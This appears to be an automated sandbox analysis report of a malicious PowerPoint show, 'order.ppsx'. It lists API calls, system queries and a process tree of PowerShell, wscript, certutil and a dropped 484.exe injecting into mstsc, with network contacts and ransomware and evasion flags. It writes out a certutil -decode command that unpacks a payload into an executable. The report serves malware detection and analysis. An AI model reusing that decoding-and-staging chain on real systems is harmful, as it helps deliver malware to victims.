Source: C:\Windows\System32\mstsc.exeProcess information set: FAILCRITICALERRORS and NOGPFAULTERRORBOX
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_001702B2 RtlExitUserThread,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_001702B2
Uses certutil -decodeShow sources
Source: unknownProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

Language, Device and Operating System Detection:

barindex
Contains functionality to query local / system timeShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040DAD5 GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,GetProcessHeap,HeapAlloc,ReleaseCapture,CreateFileW,GetFileTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_0040DAD5
Contains functionality to query the account / user nameShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040A98B GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetModuleHandleA,GetProcessHeap,GetUserNameA,GetProcessHeap,HeapAlloc,GetClipboardViewer,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,lstrcmpA,GetProcessHeap,GetComputerNameA,GetProcessHeap,HeapAlloc,GetCursor,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMessageExtraInfo,GetProcessHeap,GetProcessHeap,HeapAlloc,GetClipboardOwner,GetProcessHeap,GetProcessHeap,HeapAlloc,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,CountClipboardFormats,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMessageExtraInfo,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessWindowStation,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCaptur10_2_0040A98B
Contains functionality to query windows versionShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040EFB9 EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,LoadLibraryA,GetProcAddress,GetCommandLineW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetModuleFileNameW,GetProcessHeap,RtlAllocateHeap,IsSystemResumeAutomatic,GetProcessHeap,GetModuleHandleW,ExitProcess,GetCurrentProcess,GetVersion,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetActiveWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,StrStrIW,StrStrIW,StrStrIW,CreateThread,CloseHandle,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,Sleep,10_2_0040EFB9
Queries the cryptographic machine GUIDShow sources
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_0042C882
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,GetLocaleInfoW,10_2_004244D8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_0042C8E9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,10_2_0042C796
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_TranslateName,_TranslateName,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,__itow_s,10_2_0042C925
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,10_2_0042C56A
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,10_2_0042C4C3
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: _strlen,EnumSystemLocalesA,10_2_0042C859
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_0042C3CE
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,10_1_0042C882
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,__freea,10_1_0042B9C8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_1_004244D8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,10_1_0042C8E9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,10_1_0042C5C5
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,10_1_0042C796
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_TranslateName,_TranslateName,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,__itow_s,10_1_0042C925
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,10_1_0042C56A
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,10_1_0042C4C3
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoA,___ascii_strnicmp,10_1_0042FC9F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_1_0042C3CE
Queries information about the installed CPU (vendor, model number etc)Show sources
Source: C:\Windows\System32\mstsc.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeQueries volume information: C:\ VolumeInformation

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behavior_graph main Behavior Graph ID: 281044 Sample:  order.ppsx Startdate:  28/05/2017 Architecture:  WINDOWS Score:  96 0 POWERPNT.EXE 14 8 main->0      started     8750sig Suspicious powershell command line found 5790sig Tries to download and execute files (via powershell) 8652sig Ransomware detected (based on file extension or ransom instructions from fsrm.experiant.ca) 6062sig System process connects to network (likely due to code injection or exploit) 8844sig Uses certutil -decode 6064sig System process connects to network (likely due to code injection or exploit) 522d1e521081sig Detected TCP or UDP traffic on non-standard ports 89910sig Found evasive API chain (may stop execution after checking mutex) 18610sig Maps a DLL or memory area into another process 21810sig Writes to foreign memory regions 89913sig Found evasive API chain (may stop execution after checking mutex) 66613sig Found stalling execution ending in API Sleep call 87113sig Sample execution stops while process was sleeping (likely an evasion) d1e521083 cccn.nl 46.21.169.110, 80 TechnotopInternetBV Netherlands d1e508725 cccn.nl d1e521081 185.159.82.38, 45000 SkylineTelephone unknown d1e521081->522d1e521081sig d1e356750 484.exe, PE32 0->8750sig 0->5790sig 2 powershell.exe 61 7 0->2      started     2->8652sig 2->6062sig 2->d1e521083 2->d1e508725 4 wscript.exe 7 2->4      started     4->8844sig 4->6064sig 4->d1e521081 6 certutil.exe 2 4->6      started     8 cmd.exe 4->8      started     11 cmd.exe 4->11      started     6->d1e356750 dropped 10 484.exe 8->10      started     10->89910sig 10->18610sig 10->21810sig 13 mstsc.exe 10->13      started     13->89913sig 13->66613sig 13->87113sig process0 signatures0 process2 dnsIp2 signatures2 process4 dnsIp4 signatures4 process6 fileCreated6 process10 signatures10 process13 signatures13 fileCreated0 fileCreated2 fileCreated4

Yara Overview

No Yara matches

Screenshot